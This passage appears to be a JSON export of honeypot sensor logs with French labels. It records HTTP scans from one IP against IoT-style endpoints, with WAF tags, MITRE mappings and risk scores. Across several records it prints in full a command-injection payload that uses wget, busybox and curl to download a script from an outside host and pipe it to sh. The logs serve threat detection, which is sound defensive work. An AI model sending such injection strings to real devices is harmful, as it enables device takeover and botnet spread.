\/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nCon\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ef36606b48d2d0b29b31553af5ef027de7d3f1ac\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":274},{"id":11809387,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54818,"dst_port":82,"service":"http","classification":"rest_api_enum","waf_score":66,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022a08e609c3d8febbd409eb3ccc540c53b477b79ce\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 285, \u0022payload_entropy\u0022: 5.121443346409504, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 60.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 58, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022da01c37f78cb3864d818b8b39033b231032bd46e\u0022, \u0022event_fingerprint\u0022: \u00228e4a7aac718c3bf57a5c55daeb60f4ed4408b498\u0022, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 191, \u0022precision_signals\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/api\/v1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 58}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002211abfdb069af48b8037f814480bd2d20\u0022, \u0022path_pattern_hash\u0022: \u0022212e3326ed94d54abc342a251f15ffe2\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 58}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022query_string\u0022: \u0022command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022query_string\u0022: \u0022command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\\r\\nHost: 62.3.50\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022unknown\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00228d7b54f4367992e607390616d6028f7bccd23ca6\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiao\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:82 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 10 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 58\/100 (Moyen) \u2014 MITRE TA0007 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 58}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 58, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1190-api\u0022, \u0022Upstream\u0022, \u0022Api Probe Generic\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiao\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:82 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 10 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_api_route_probe\u0022, \u0022http_idor_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_api_route_probe\u0022, \u0022http_idor_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":285},{"id":11809388,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54832,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022asp\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: 